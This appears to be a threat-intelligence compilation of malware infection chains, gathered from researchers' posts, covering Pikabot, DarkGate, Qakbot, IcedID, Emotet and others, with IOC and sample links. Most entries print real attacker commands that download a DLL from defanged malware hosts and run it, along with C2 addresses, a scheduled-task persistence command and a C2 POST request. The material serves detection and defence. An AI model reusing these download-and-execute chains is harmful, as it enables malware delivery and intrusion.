Top 50 Techniques & Procedures

Top 50 Techniques & Procedures

url > .zip > .js > .dll

#Pikabot - #TA577 - url > .zip > .js > .dll twitter.com/Cryptolaemus1/status/1709933199..

proxy everywhere

#Pikabot - #TA577 - url > .zip > .js > .dll

wscript PO_13670.js

cmd /c mkdir C:\ProgramData\LimdD\

WinHttp superrrdental.]com/H6F/dshjdsjkkd C:\ProgramData\LimdD\laminos.dll

rundll32.exe C:\ProgramData\LimdD\laminos.dll, HUF_inc_var

IOC's github.com/pr0xylife/Pikabot/blob/main/Pika..

url > .zip > .lnk > curl > .dll

#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll twitter.com/Cryptolaemus1/status/1709238615..

proxy everywhere

#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll

cmd /c TZZ.pdf.lnk

curl 207.246.78.]68/6kQh/T7t -o UL.log

rundll32 UL.dll, HUF_inc_var

c2's 167.86.96.]3:2222 38.242.240.]28:1194 167.86.81.]87:2222 79.141.175.]96:2078 209.126.9.]47:2078

IOC's github.com/pr0xylife/Pikabot/blob/main/Pika..

url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe twitter.com/Cryptolaemus1/status/1708869147..

proxy everywhere

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

cmd /c MFGT.lnk

curl 136.244.92.]148/rdFR2/GbB -o fjw.vbs

wscript fjw.vbs

cmd /c mkdir c:\rqdp

curl http://81.19.135.]17:2351 -o nvptjf.au3

Autoit3.exe nvptjf.au3

IOC's github.com/pr0xylife/DarkGate/blob/main/Dar..

url > .zip > lnk > .vbs > .exe

#DarkGate - #TA577 - url > .zip > lnk > .vbs > .exe twitter.com/Cryptolaemus1/status/1708869147..

proxy everywhere

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

cmd /c MFGT.lnk

curl 136.244.92.]148/rdFR2/GbB -o fjw.vbs

wscript fjw.vbs

cmd /c mkdir c:\rqdp

curl http://81.19.135.]17:2351 -o nvptjf.au3

Autoit3.exe nvptjf.au3

IOC's github.com/pr0xylife/DarkGate/blob/main/Dar..

url > .xll > curl > .dll

#IcedID - #TA577 - url > .xll > curl > .dll twitter.com/Cryptolaemus1/status/1706635492..

proxy everywhere

#IcedID - #TA577 - url > .xll > curl > .dll

EXCEL.EXE Sr.xll

cmd /c curl -o c:\users\public\9y.dat 135.125.177.]95/syK/3IldTx

rundll32 c:\users\public\9y.dat scab /k besogon728

Samples 👇

bazaar.abuse.ch/sample/310b9b7f54880f214288..

bazaar.abuse.ch/sample/f45d0303851f913cef47..

IOC's github.com/pr0xylife/IcedID/blob/main/icedI..

pdf > url > .js > ps > .dll

#Qakbot - BB32 - pdf > url > .js > ps > .dll twitter.com/Cryptolaemus1/status/1669669651..

proxy everywhere

#Qakbot - BB32 - pdf > url > .js > ps > .dll

wscript Cx.js

powershell $res = "149.154.158.]191/znxlW/MGjrJji3RDB"; foreach ($Fo in $res) try {$Go = FromBase64($Fo)); iwr $Go -O C:\ProgramData\99.9.dll

rundll32 C:\ProgramData\99.9.dll,must

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.pdf > .zip > curl > .dll

#Qakbot - obama268 - .pdf > .zip > curl > .dll twitter.com/Cryptolaemus1/status/1669024540..

proxy everywhere

#Qakbot - obama268 - .pdf > .zip > curl > .dll

wscript CalculationOfCosts-1337.js

cmd.exe /c mkdir C:\Koltes\Fertiol & curl rapiska.]com/1337dat --output C:\Koltes\Fertiol\Floster.OCX

rundll32 C:\Koltes\Fertiol\Floster.OCX,must

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

url > .zip > .js > curl > .dll

#Qakbot - BB32 - url > .zip > .js > curl > .dll twitter.com/Cryptolaemus1/status/1668965414..

proxy everywhere

#Qakbot - BB32 - url > .zip > .js > curl > .dll

wscript.exe docu_DF631_Jun_14_1.js

curl.exe -o c:\users\public\amounted.tmp 192.121.17.]149/QmVep/DB278

conhost.exe rundll32.exe amounted.tmp,must

rundll32.exe amounted.tmp,must

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.pdf > .zip > .js > .msi > .dll

#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll twitter.com/Cryptolaemus1/status/1664300425..

proxy everywhere

#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll

wscript.exe ProjectFunding_1337_Jun01.js

msiexec.exe /V

rundll32.exe C:\Users\Admin\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

BB19 - .html > url > .js > .ps > .dll

#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll twitter.com/pr0xylife/status/16364024139123..

#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll

wscript.exe LL.js

$Mag = (hanika-inc.]com/mjnPR9/uo)

foreach ($washman in $Mag) {try {Invoke-WebRequest $washman -O $env:TEMP\Sulfuryl.dll

rundll32 $env:TEMP\Sulfuryl.dll,LS88

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.pdf > .zip > .wsf > xmlhttp > .dll

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll twitter.com/Cryptolaemus1/status/1661413082..

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll

wscript.exe Claim_C736.wsf

var u = "45.76.58.]72/a0UFMZnC6ltxphw.dat" http.open("GET", u[i], false)

conhost.exe rundll32.exe C:\Users\Public\amLE5PKlGAXrhpU.dat,bind

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.one > .iso > .chm > ps > .dll

#Qakbot - BB24 - .one > .iso > .chm > ps > .dll twitter.com/Cryptolaemus1/status/1648632165..

#Qakbot - BB24 - .one > .iso > .chm > ps > .dll

hh E:\README-JRN44.chm

powershell $sensillum = ("hotellosmirtos.]com/sjn/Tn0Q3nieE")

foreach ($form in $sensillum) {try {wget $form -O $env:TEMP\hexatetra

rundll32 $env:TEMP\hexatetra,Motd

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.one > .img > .wsf > ps > .dll

#Qakbot - BB22 - .one > .img > .wsf > ps > .dll twitter.com/Cryptolaemus1/status/1643614470..

#Qakbot - BB22 - .pdf > .zip > .wsf > ps > .dll

wscript AprilDetails.wsf

powershell $spear = ("kmphi.]com/FWovmB/8oZ0BOV5HqEX")

foreach ($banter in $spear) {try {wget $banter -O $env:TEMP\Lownesses

rundll32 $env:TEMP\Lownesses,X555

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

url > .js > ps > .dll

#Qakbot - BB33 - url > .js > ps > .dll twitter.com/Cryptolaemus1/status/1671489179..

#Qakbot - BB33 - url > .js > ps > .dll

wscript Ix.js

powershell -encodedcommand $N = "151.236.14.]60/c1oHe/q9cRd2n0"

md C:\ProgramData\SNWSlycop

iwr $Brunt -O C:\ProgramData\SNWSlycop\joind.dll

rundll32 C:\ProgramData\SNWSlycop\joind.dll

IOC's github.com/pr0xylife/Qakb

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com twitter.com/k3dg3/status/1612860949773389835

Today's #IcedID "1421378695" dropped via PDFs with payloads hosted on firebasestorage.googleapis.com.*

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com

bazaar.abuse.ch/sample/1796aef0940e800bcb25..

hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID twitter.com/k3dg3/status/1697331227940798731

#IcedID "4240553492" rolling in

c2: oopscokir.com ProjectID: 4240553492

filename: inv_ug_08-31_[0-9]{3,5}.pdf Curl payload ex: hxxps://avestainfratech.com/out/t.php

tldr: hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID

email > PDF > URL > Keitaro redirect > zip > pass > exe

email > PDF > URL > Keitaro redirect > zip > pass > exe twitter.com/k3dg3/status/1683544196341219341

Incoming #IcedID "1561373935" filename: inv-details-jul23.pdf

Loader C2: filtaferamoza.com

email > PDF > URL > Keitaro redirect > zip > pass > exe

tria.ge/230724-w1dlaaha6w/behavioral1 bazaar.abuse.ch/sample/8b5529d29aeaf195889e..

url > zip > lnk url > xll pdf > url > xll > msi

url > zip > lnk url > xll pdf > url > xll > msi twitter.com/pr0xylife/status/17053311013658..

#TA577 - Back on the scene pushing #Darkgate

Time to resume tracking operations, welcome back Tramp.

Distro 👇

url > zip > lnk url > xll pdf > url > xll > msi

Samples 👇

bazaar.abuse.ch/sample/026f4c95783ed33bc31c..

bazaar.abuse.ch/sample/2eee7af95e457c97fb0b..

bazaar.abuse.ch/sample/bb2434f22b2fb7801cdd..

bazaar.abuse.ch/sample/5bc060bd720757919db4..

.zip > .doc > .dll

#Emotet- epoch4 - .zip > .doc > .dll twitter.com/pr0xylife/status/16330969100084..

#Emotet- epoch4 - .zip > .doc > .dll

WINWORD.EXE /n INVOICE 589 03_23.doc /o

midcoastsupplies.]com].au/configNQS/Es2oE4G..

regsvr32.exe C:\Windows\system32\MSBjdGgEfuEG\evPaAyJzdCSx.dll

IOC's github.com/pr0xylife/Emotet/blob/main/e4_em..

.pdf > .url > .zip > .iso > .cmd > .exe

#IcedID - .pdf > .url > .zip > .iso > .cmd > .exe twitter.com/pr0xylife/status/16164649501381..

#IcedID - .pdf > .url > .zip > .iso > .lnk > .cmd > .dll

cmd.exe /c REF_Document.lnk

cmd.exe /c sacsimsapI.cmd

rundll32 standing.dat,init

c2'

umousteraton.]com

Samples here 👇

bazaar.abuse.ch/sample/3390b1d8560f565ed5e2..

bazaar.abuse.ch/sample/ad174760985c5418b4a3..

IOC's github.com/pr0xylife/IcedID/blob/main/icedI..

url > .zip > .one > .hta > .curl > .dll

#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll twitter.com/pr0xylife/status/16207513404851..

#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll

mshta Open.hta

curl -o C:\ProgramData\index.png --url billmanagersystem.]com/ikA/d.gif

rundll32 C:\ProgramData\index.png,Wind

Samples 👇

bazaar.abuse.ch/sample/6c49b4d40b2925a4e591..

bazaar.abuse.ch/sample/284f0fabbdfc1172cb1c..

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.pdf > .zip > .js > .dll

#Qakbot - obama270 - .pdf > .zip > .js > .dll twitter.com/Cryptolaemus1/status/1671528958..

#Qakbot - obama270 - .pdf > .zip > .js > .dll

wscript RrwuR.js

powershell -enc $bread = "viltare.]com/PlI6qXoN.dat"

md C:\ProgramData\SNWSPinna

iwr $Medio -O C:\ProgramData\SNWSPinna\Pinna.dll

rundll32 C:\ProgramData\SNWSPinna\Pinna.dll

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

url > .zip > .vhd > .lnk > .cmd > .cmd > .dll

#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll twitter.com/pr0xylife/status/15997873753112..

#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll

cmd /c HG.lnk

cmd.exe /q /c pests.cmd

cmd.exe /K dispersers.cmd system rundl

rundll32 erect.tmp,DrawThemeIcon

Samples 👇

bazaar.abuse.ch/sample/15c1feb12ecedafc233e..

bazaar.abuse.ch/sample/c6887e515b36694e8e73..

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

url > .zip > .xlsb > .dll

#Qakbot - bb - url > .zip > .xlsb > .dll twitter.com/pr0xylife/status/15776714553361..

#Qakbot - bb - url > .zip > .xlsb > .dll

CreateDirectoryA C:\Hefagga

CreateDirectoryA C:\Hefaggad\Ukdfaovkga

metroberrylocalmarketing.]com/7z8b/0.html

regsvr32 /s calc

regsvr32 C:\Hefaggad\Ukdfaovkga\Buuefafa.dll

bazaar.abuse.ch/sample/d3788e69dd125449af3d..

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.html > .zip > .iso > .lnk > .png > .dll

#IcedID - .html > .zip > .iso > .lnk > .png > .dll twitter.com/pr0xylife/status/15759033825055..

#IcedID - .html > .zip > .iso > .lnk > .png > .dll

cmd.exe /c start ru^n^d^l^l3^2 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit

rundll32 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit

bazaar.abuse.ch/sample/0ab12d65800f3e7e6089..

c2 triskawilko.]com

IOC's github.com/pr0xylife/IcedID/blob/main/icedI..

url > .zip > .lnk > curl > wscript > curl > .dll

#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll twitter.com/pr0xylife/status/15700643109233..

#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll

MD "C:\ProgramData\A_Np\fcA"

curl.exe -o %ProgramData%\A_Np\fcA\GCk.js ap2web.]com/MwS/13.html

wscript.exe GCk.js

paritoys.]com/9nD/130.html

regsvr32 REPORT_9MyMg_.SRm.IH.dll

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.zip > .docm > .curl > .dll

#IcedID - .zip > .docm > .curl > .dll twitter.com/pr0xylife/status/15653543637652..

#IcedID - .zip > .docm > .curl > .dll

cmd /c curl 193.178.210.]58/-o c:\ProgramData\MH4SG6MYDDyi.dll && rundll32 c:\ProgramData\MH4SG6MYDDyi.dll,#1

bazaar.abuse.ch/sample/133245a337b1703f3940..

c2 donorcabr.]com

IOC's github.com/pr0xylife/IcedID/blob/main/icedI..

EML>.tar.gz>.exe

EML>.tar.gz>.exe twitter.com/Tac_Mangusta/status/17091077860..

EML>zip pw>.url>SMB>zip>vbs>certutil

EML>zip pw>.url>SMB>zip>vbs>certutil>#Ursnif twitter.com/JAMESWT_MHT/status/170691921458..

pec > .zip > .url > .exe (smb)

pec > .zip > .url > .exe (smb) twitter.com/Tac_Mangusta/status/17037167082..

Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key)

Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key) twitter.com/Tac_Mangusta/status/17022475125..

USB > .lnk > .ps1 > .exe

USB > .lnk > .ps1 > .exe twitter.com/Tac_Mangusta/status/16781859813..

LZH > EXE

LZH > EXE twitter.com/reecdeep/status/169653942021905..

Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of Metamorfo DLL's

Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of #Metamorfo DLL's twitter.com/0xToxin/status/1694756006889206..

Bumblebee

#Bumblebee Infection Flow TTPs🐝 [+] Mark-of-the-Web Bypass: IMG (T1553.005) [+] Malicious File: LNK (T1204.002) [+] Windows Command Shell: BAT (T1059.003) [+] Rename System Utilities: copy & rename (T1036.003) [+] Scheduled Task: schtasks.exe (T1053.005) [+] Rundll32(T1218.011)

twitter.com/Max_Mal_/status/160084767627000..

HTML to PluginInit

[+] HTML Smuggling (T1027.006) [+] Msiexec - .msi stager (T1218.007) [+] Rundll32 - .dll loader (T1218.011) [+] New export func: init, a short version of PluginInit🔥

#DFIR exec flow: msi > [RPC Install] > msiexec > rundll32 twitter.com/Max_Mal_/status/160043385493786..

EML>Pdf>Url>js>url>js>url>PEDLL

EML>Pdf>Url>js>url>js>url>PEDLL> twitter.com/JAMESWT_MHT/status/167898279170..

Onenote sample > Bat > curl url > Dll

Onenote sample > Bat > curl url > Dll twitter.com/JAMESWT_MHT/status/164178266150..

bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf

bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf twitter.com/JAMESWT_MHT/status/165878579939..

Qakbot js

Qakbot - JS -> DLL -> Sacrificial Process WmiPrvSE conhost =› conhost. exe conhost. exe conhost. exe rund1132. exe C: \Users \alice\noises.dat, next conhost =› conhost. exe conhost. exe rundll32. exe C: \Users\alice\noises.dat, next conhost => conhost. exe rund1132. exe C: \Users \alice \noises. dat, next rund1132 => rund1132.exe C: \Users \alice \noises.dat, next rund1132 => rundl132.exe C: \Users \alice\noises.dat, next explorer C: \Windows \SysW0W64 \explorer. exe

twitter.com/ACEResponder

Pikabot

#Pikabot execution chain: ➡️ rundll32.exe <PikaBot_payload>.dll,Test (initial execution) ➡️ WerFault.exe (connects to PikaBot C2, in our case it's 45.85.235[.]39) ➡️ whoami.exe /all ➡️ ipconfig.exe /all ➡️ schtasks.exe /Create /F /TN "{B220CD07-2339-4E8E-8FDD-DF2C6D1B42DC}" /TR "cmd /q /c start /min "" powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\Software\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly"" /SC HOURLY /MO (example of the scheduled task as a persistence mechanism, the registry values and task name can change) NOTE: whoami, ipconfig, schtasks were spawned from WerFault.exe ➡️ PowerShell execution: powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\Software\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly" ➡️ PowerShell execution (child process): "powershell.exe" -encodedcommand [REDACTED] -> decoded output is provided in the screenshot ➡️ curl.exe --url hxxps://192.9.135[.]73:1194/neurophysiologi.. -A upb4geF6poodkVW2YaySEzk4C32sCDV -X POST --insecure (sends the POST request out to one of the IPs in the decoded output) ➡️ powershell.exe start rundll32 $env:APPDATA\Microsoft\HydrofluoboricInclaspedNonredressing\ParodyRoisterImpressibly.dll, Test (starts the PikaBot payload) ➡️ The POST request sent to C2: {"ParodyRoisterImpressibly":"CgBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwASAB5AGQAcgBvAGYAbAB1AG8AYgBvAHIAaQBjAEkAbgBjAGwAYQBzAHAAZQBkAE4AbwBuAHIAZQBkAHIAZQBzAHMAaQBuAGcAXABQAGEAcgBvAGQAeQBSAG8AaQBzAHQAZQByAEkAbQBwAHIAZQBzAHMAaQBiAGwAeQAuAGQAbABsACwAIABUAGUAcwB0AAoA","success":"true"} (Base64-encoded string contains the command to execute the PikaBot DLL payload on the host)

twitter.com/AnFam17

#Qakbot DLL Side-Loading TTPs DFIR exec flow: ZIP > EXE&DLL > curl > rundll32

#Qakbot DLL Side-Loading #TTPs#DFIR exec flow: ZIP > EXE&DLL > curl > rundll32 twitter.com/Max_Mal_

Redirect Services

⚠️ Legitimate Services Abused For Phishing Purposes

1- Bing Redirect - app.any.run/tasks/9a1e55eb-05c5-499b-b995-d..

2- Google AMP - app.any.run/tasks/544a7608-87b2-4e37-9804-5..

3- Microsoft Customer Voice - app.any.run/tasks/e239ecc0-74cf-45ed-9f15-f..

4- Cloudflare R2 Dev Bucket - app.any.run/tasks/41d192ee-95d9-4aed-a8eb-7..

twitter.com/anyrun_app/status/1709193919118..

VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT

VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT

twitter.com/dark0pcodes